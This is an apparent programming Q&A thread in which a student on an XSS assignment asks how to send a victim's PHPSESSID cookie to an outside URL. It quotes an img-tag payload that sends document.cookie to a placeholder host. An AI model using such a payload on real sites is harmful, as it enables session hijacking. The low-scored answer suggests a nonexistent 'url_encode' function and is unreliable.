# Pass $.variable in url

Tags: php, html, cookies, xss

I would like to pass a variable as a value to a website. (Doing a school assignment on XSS)

For example I currently have:
$.cookie('echat') and $.cookie('PHPSESSID')

I would like to pass it into a link say:
xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID')

However, nothing is pass to xxxx.com/xxx.php

Any1 know the syntax to do this?

specifically i am placing a img tag like this to exploit:

&lt img src='http://xxxxx.com/xxxxx.php?cookie='+document.cookie&gt

Apparently, document.cookie is not working and I need $.cookie('PHPSESSID') to get the PHPID

Comment: You use `.` in your variable name ?

Comment: @iamsleepy That looks like jQuery code.

Comment: i am trying to exploit people "planted" bug and encounter this problem.

Answer (score 0):

Your URL is setting the value of `$_GET['cookie']` to `$.cookie('PHPSESSID')` in your PHP script, nothing more. How that's handled is up to PHP.

Since that looks like JavaScript (specifically, the jQuery Cookie plugin), you could conceivably do `echo "<script>{$_GET['cookie']}</script>";` in your PHP to spit it out as JS on the resulting page. As you hopefully know from your classes, blindly using user-submitted data like this is **dangerous and a bad idea**.

Comment: i couldn't do this because the exploit has to be done in a url. and script tag is santize

Answer (score -1):

use this php function

```
url_encode("string")
```

such as

```
http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>
```